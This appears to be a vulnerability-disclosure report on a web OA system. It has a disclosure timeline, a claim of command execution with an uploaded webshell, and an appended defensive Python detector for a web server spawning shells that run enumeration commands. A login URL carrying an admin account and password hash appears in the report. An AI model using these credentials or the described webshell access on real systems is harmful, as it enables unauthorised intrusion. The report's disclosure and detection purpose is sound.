2015-11-11: Details sent to the vendor; awaiting vendor handling
2015-11-23: Vendor confirmed; details disclosed to the vendor only
2015-12-03: Details disclosed to core white hats and relevant domain experts
2015-12-13: Details disclosed to regular white hats
2015-12-23: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
The system at **.**.**.**:8080/FYOA/login.action?user.account=admin&user.password=e10adc3949ba59abbe56e057f20f883e&randomnum=892448 has a command execution vulnerability.
A trojan (webshell) was uploaded directly to the server.
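As an added defensive example (not part of the original report): the report's shell session shows host-enumeration commands (net user, net share, net view, netstat, tasklist, ipconfig, systeminfo) run from the Tomcat directory D:\tomcatCPPCCOA\bin, i.e. the Tomcat java.exe process spawning cmd.exe. The Python below flags that pattern in process-creation events; the Sysmon-style field names and the sample events are assumptions constructed here.

```python
import re
from collections import Counter

# Constructed sample events (Sysmon Event ID 1 field names assumed; values
# invented to mirror the report's session, where Tomcat under
# D:\tomcatCPPCCOA ran net/netstat/tasklist/ipconfig/systeminfo).
SAMPLE_EVENTS = [
    {"ParentImage": r"D:\tomcatCPPCCOA\bin\java.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe", "CommandLine": 'cmd.exe /c "net user"'},
    {"ParentImage": r"D:\tomcatCPPCCOA\bin\java.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe", "CommandLine": 'cmd.exe /c "net view"'},
    {"ParentImage": r"D:\tomcatCPPCCOA\bin\java.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe", "CommandLine": 'cmd.exe /c "systeminfo"'},
    # Benign: an interactive admin session, not a web server process.
    {"ParentImage": r"C:\WINDOWS\explorer.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe", "CommandLine": 'cmd.exe /c "ipconfig /all"'},
    # Benign: Tomcat launching another JVM, not a shell.
    {"ParentImage": r"D:\tomcatCPPCCOA\bin\java.exe",
     "Image": r"D:\tomcatCPPCCOA\bin\java.exe", "CommandLine": "java -jar helper.jar"},
]

# Processes that serve HTTP and should almost never spawn an OS shell.
WEB_PARENT = re.compile(r"\\(java|javaw|tomcat\d*|w3wp|httpd)\.exe$", re.I)
SHELL = re.compile(r"\\(cmd|powershell|wscript|cscript)\.exe$", re.I)
# Enumeration commands seen in the report's session.
RECON = re.compile(r"\b(net\s+(user|share|view|start)|netstat|tasklist|ipconfig|systeminfo)\b", re.I)


def classify(ev):
    """Return a list of reasons; an empty list means the event is not suspicious."""
    reasons = []
    if WEB_PARENT.search(ev.get("ParentImage", "")) and SHELL.search(ev.get("Image", "")):
        reasons.append("web server process spawned a shell")
        m = RECON.search(ev.get("CommandLine", ""))
        if m:
            reasons.append("host enumeration: " + m.group(0))
    return reasons


def detect(events):
    """Return (alerts, shell-spawn counts per parent image). Several shell
    spawns from one web server process look like an interactive webshell session."""
    alerts, per_parent = [], Counter()
    for ev in events:
        reasons = classify(ev)
        if reasons:
            alerts.append((ev["CommandLine"], reasons))
            per_parent[ev["ParentImage"].lower()] += 1
    return alerts, per_parent
```

The parent/child check is the strong signal; the command-name match only adds context, so a shell spawned by Tomcat is flagged even when the command is not in the RECON list.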
Strengthen security awareness.
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-11-23 10:24
CNVD confirmed and reproduced the reported vulnerability; it has been forwarded via CNCERT to the Zhejiang branch, which will coordinate handling with the website's operating unit.
None yet